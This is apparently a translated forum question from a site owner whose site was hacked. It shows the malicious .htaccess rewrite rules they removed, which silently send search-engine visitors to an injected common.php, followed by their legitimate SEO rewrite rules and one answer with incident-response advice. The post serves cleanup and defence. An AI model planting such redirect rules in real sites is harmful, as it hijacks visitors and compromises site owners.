Возможный дубликат:
Мой сервер был взломан ЭКСТРЕННО
Недавно мой сайт взломали. Думаю, я нашел код, который был добавлен в файл htaccess, удалил его, а затем добавил скрипт, чтобы предотвратить повторный доступ к файлу htaccess. Я также удалил файл php, на который ссылается взломанный код (common.php). Что мне делать дальше? Я не программист и не разработчик веб-сайтов, но мне очень хотелось посмотреть, смогу ли я сам исправить проблему, так как я потратил немало часов на попытки и не сдаюсь так просто.
Вот взломанный код, который я удалил:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/httpd/vhosts/bluestardive.com/httpdocs/common.php -f
RewriteRule ^.*$ /common.php [L]
</IfModule>
этот код должен оставаться в файле htaccess, так как он перенаправляет мой URL-адрес на дружественные для SEO ссылки, иначе возникнут ошибки на сайте, но был ли этот код также взломан?
# Apache search queries statistic module
RewriteEngine On
AddHandler php5-fastcgi .php .php5
# <contrexx>
# <core_modules__alias>
RewriteRule ^about-us$ /index.php?page=883 [L,NC]
RewriteRule ^ausfluge-und-aktivitaten$ /index.php?page=800 [L,NC]
RewriteRule ^bluestardive-news$ /index.php?page=919 [L,NC]
RewriteRule ^bookings$ /index.php?page=911 [L,NC]
RewriteRule ^diveresort$ /index.php?page=879 [L,NC]
RewriteRule ^diving$ /index.php?page=880 [L,NC]
RewriteRule ^excursions-and-activities$ /index.php?page=881 [L,NC]
RewriteRule ^galerie$ /index.php?section=gallery [L,NC]
RewriteRule ^oceannight$ http://www.bluestardive.com/index.php?page=906 [L,NC]
RewriteRule ^philosophy$ /index.php?page=846 [L,NC]
RewriteRule ^reservation$ /index.php?page=917 [L,NC]
RewriteRule ^reservierung$ /index.php?page=918 [L,NC]
RewriteRule ^resort$ /index.php?page=798 [L,NC]
# </core_modules__alias>
# </contrexx>
решение1
Лучшее, что можно сделать в подобных ситуациях, — это определить точку входа пользователя и повторить атаку. Я не могу сказать, добавлено ли что-то подозрительное в .htaccess, поскольку понятия не имею, что находится внутри index.php.
Если index.php выводит данные непосредственно из базы данных, то вполне возможно, что он/она добавил(а) вредоносный код в базу данных, возможно, он/она создал(а) несколько новых точек входа (PHP Shells, Vulns) в других файлах.
Я настоятельно рекомендую вам обратиться к специалисту по безопасности. Если же нет, тщательно проверьте еще раз каждый файл на вашем сервере, включая записи в базе данных.
Обязательно выясните, где была точка входа, чтобы предотвратить будущие атаки. Если вам понадобится дополнительная информация, вы всегда можете связаться со мной.